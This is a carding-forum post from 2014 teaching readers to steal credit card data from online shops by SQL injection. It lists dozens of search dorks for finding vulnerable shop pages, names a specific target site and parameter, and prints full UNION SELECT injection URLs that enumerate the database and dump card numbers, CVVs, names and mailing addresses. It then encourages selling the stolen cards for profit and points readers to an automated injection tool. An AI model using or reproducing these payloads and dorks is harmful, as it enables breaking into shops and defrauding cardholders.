View Single Post
  #1 Old 12-25-2014, 08:33 PM
Honest Seller
VERIFIED
 
Honest Seller's Avatar
 
Join Date: Sep 2013
Location: Carding World
Posts: 88
Contact: ICQ: 660-670
Honest Seller 1
Send a message via ICQ to Honest Seller
Default Get fresh cc or $300 for 20 minutes

Hello dear friends, in this article I'll show you how to quickly get good valid cc, there are so many ways, from the logs of a botnet, ending wopov dumps. In this article we will examine one of the ways how to merge with cardboard shop goes online via sql injection.

1) The first step is to search for vulnerable shop. There is quite simple, the internet is full of doorways to find, here's an example dors:

Code:
InI Dork Untuk Carding
 inurl:".php?cat="+intext:"Paypal"+site:UK
 inurl:".php?cat="+intext:"/Buy Now/"+site:.net
 inurl:".php?cid="+intext:"online+betting"
 inurl:".php?id=" intext:"View cart"
 inurl:".php?id=" intext:"Buy Now"
 inurl:".php?id=" intext:"add to cart"
 inurl:".php?id=" intext:"shopping"
 inurl:".php?id=" intext:"boutique"
 inurl:".php?id=" intext:"/store/"
 inurl:".php?id=" intext:"/shop/"
 inurl:".php?id=" intext:"toys"
 inurl:".php?cid="
 inurl:".php?cid=" intext:"shopping"
 inurl:".php?cid=" intext:"add to cart"
 inurl:".php?cid=" intext:"Buy Now"
 inurl:".php?cid=" intext:"View cart"
 inurl:".php?cid=" intext:"boutique"
 inurl:".php?cid=" intext:"/store/"
 inurl:".php?cid=" intext:"/shop/"
 inurl:".php?cid=" intext:"Toys"
 inurl:".php?cat="
 inurl:".php?cat=" intext:"shopping"
 inurl:".php?cat=" intext:"add to cart"
 inurl:".php?cat=" intext:"Buy Now"
 inurl:".php?cat=" intext:"View cart"
 inurl:".php?cat=" intext:"boutique"
 inurl:".php?cat=" intext:"/store/"
 inurl:".php?cat=" intext:"/shop/"
 inurl:".php?cat=" intext:"Toys"
 inurl:".php?catid="
 inurl:".php?catid=" intext:"View cart"
 inurl:".php?catid=" intext:"Buy Now"
 inurl:".php?catid=" intext:"add to cart"
 inurl:".php?catid=" intext:"shopping"
 inurl:".php?catid=" intext:"boutique"
 inurl:".php?catid=" intext:"/store/"
 inurl:".php?catid=" intext:"/shop/"
 inurl:".php?catid=" intext:"Toys"
it is not the whole list dorok , but only a small part.
Then, after 10 minutes of searching, I found a suitable shop us http://www.hgdfoods.com

2) The second step is to search for vulnerabilities on the site to check whether sql vulnerability, simply substitute the quote at the end of the link and see if the parameter is vulnerable.
site.com/index.php?id=1 example link
site.com/index.php?id=1' example where the need to quote
Climb on the site, I found a vulnerable parameter http://www.hgdfoods.com/recipes-show.php?r=51'
We climbed this error.
Explain in detail how to twist cheekbones already no sense , since the Internet is full of different programs, with which you can easily unleash whine without having any programming skills . One of the most popular programs is havij, it is easy to download online, below I'll post a link to the latest version.
Now I 'll show you step by step how to access the database.
Twist cheekbones to know the database name.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(schema_name)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.schemata+++limit+0,1+--+
So it is, we know the name of your database "hgdfoods2"
learn more names of tables that inside database using this query to the database:

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(table_name)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+TABLE_SCHEMA=0x686764666f6f647332++limit+0,1+--+
Then I noticed the table "Credit Cards", make up the database and query and get speakers that are in the table.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,88,93),concat(cast(group_concat(COLUMN_NAME)+as+char)),CHAR(91,88,88,93)),3,4,5,6,7,8,9,10+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA=0x686764666f6f647332+AND+TABLE_NAME=0x6372656469745f6361726473++limit+0,1+--+
We've got a column with the data on the cards.
Choose the right column and see whether there is in the shop goes online database cardboard.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+1,CONCAT(CHAR(100,100,100),CHAR(91,99,97,114,100,95,110,117,109,98,101,114,93),card_number,CHAR(91,99,97,114,100,95,110,117,109,98,101,114,93),CHAR(91,101,120,112,95,109,111,110,116,104,93),exp_month,CHAR(91,101,120,112,95,109,111,110,116,104,93),CHAR(91,101,120,112,95,121,101,97,114,93),exp_year,CHAR(91,101,120,112,95,121,101,97,114,93),CHAR(91,99,99,118,95,110,117,109,98,101,114,93),ccv_number,CHAR(91,99,99,118,95,110,117,109,98,101,114,93),CHAR(91,110,97,109,101,95,111,110,95,99,97,114,100,93),name_on_card,CHAR(91,110,97,109,101,95,111,110,95,99,97,114,100,93),CHAR(91,109,97,105,108,105,110,103,95,97,100,100,114,101,115,115,93),mailing_address,CHAR(91,109,97,105,108,105,110,103,95,97,100,100,114,101,115,115,93),CHAR(91,99,105,116,121,93),city,CHAR(91,99,105,116,121,93),CHAR(91,115,116,97,116,101,93),state,CHAR(91,115,116,97,116,101,93),CHAR(91,122,105,112,93),zip,CHAR(91,122,105,112,93)),3,4,5,6,7,8,9,10+FROM+hgdfoods2.credit_cards+++limit+1,1+--+
Voila! We got cardboard.
Know the number of cc in the database can be on this search.

Code:
http://www.hgdfoods.com/recipes-show.php?r=5111111111111111111111111111+UNION+SELECT+13,CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),13,13,13,13,13,13,13,13+FROM+hgdfoods2.credit_cards+++--+
In a database of 110 cc, if you sell this board, you can get $ 300 for a 100 cc, not bad, right? only 20 minutes of work and we have some money in your pocket.

The moral of this article so do not be lazy and you will succeed!

Click download havij.
Honest Seller is offline   Reply With Quote